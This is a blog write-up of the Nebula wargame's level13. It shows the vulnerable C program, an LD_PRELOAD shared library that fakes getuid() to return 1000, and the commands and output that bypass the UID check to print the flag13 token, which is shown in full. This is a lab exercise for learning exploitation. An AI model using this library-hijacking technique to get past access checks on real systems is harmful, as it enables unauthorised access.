Friday, November 2, 2012

exploit-exercises Nebula: level13

Continuing with Nebula wargame, and this time with level13. The source code of the vulnerable program is provided.
#include <stdlib.h>
#include <unistd.h>
#include <stdio.h>
#include <sys/types.h>
#include <string.h>
#define FAKEUID 1000
int main(int argc, char **argv, char **envp)
{
int c;
char token[256];
if(getuid() != FAKEUID) {
printf("Security failure detected. UID %d started us, we expect %d\n", getuid(), FAKEUID);
printf("The system administrators will be notified of this violation\n");
exit(EXIT_FAILURE);
}
// snip, sorry :)
printf("your token is %s\n", token);
}
The part where the token is calculated is snipped out obivously. Because our goal is to force the program to output the token, we need to bypass the FAKEUID check. Ofcourse, our userid is different than 1000, and we can't really change it. Let's (ab)use LD_PRELOAD to hijack the getuid() system call.
level13@nebula:~$ cat mygetuid.c 
#include <sys/types.h>
uid_t getuid(void) { return 1000; }
level13@nebula:~$ gcc -shared -fPIC mygetuid.c -o mygetuid.so
level13@nebula:~$ LD_PRELOAD=./mygetuid.so ../flag13/flag13 

Security failure detected. UID 1014 started us, we expect 1000
The system administrators will be notified of this violation
One gotcha! The real user id of the binary (flag13) and the .so should be the same! Without such a restriction, a whole security model would collapse ;)
level13@nebula:~$ cp ../flag13/flag13 ./
level13@nebula:~$ ls -l
total 20
-rwxr-x--- 1 level13 level13 7321 2012-10-21 10:20 flag13
-rw-rw-r-- 1 level13 level13   60 2012-10-21 10:17 mygetuid.c
-rwxrwxr-x 1 level13 level13 6658 2012-10-21 10:24 mygetuid.so
Given that we want the binary to run and print the token value, the binary's owner is not important (this wouldn't be the case, if for example we wanted the binary to run an executable such as getflag or bash.)
level13@nebula:~$ LD_PRELOAD=./mygetuid.so ./flag13
your token is b705702b-76a8-42b0-8844-3adabbe5ac58
And that is the password for the flag13 account which we will use to log into the flag13 account, and getflag!
flag13@nebula:~$ getflag 
You have successfully executed getflag on a target account

No comments:

Post a Comment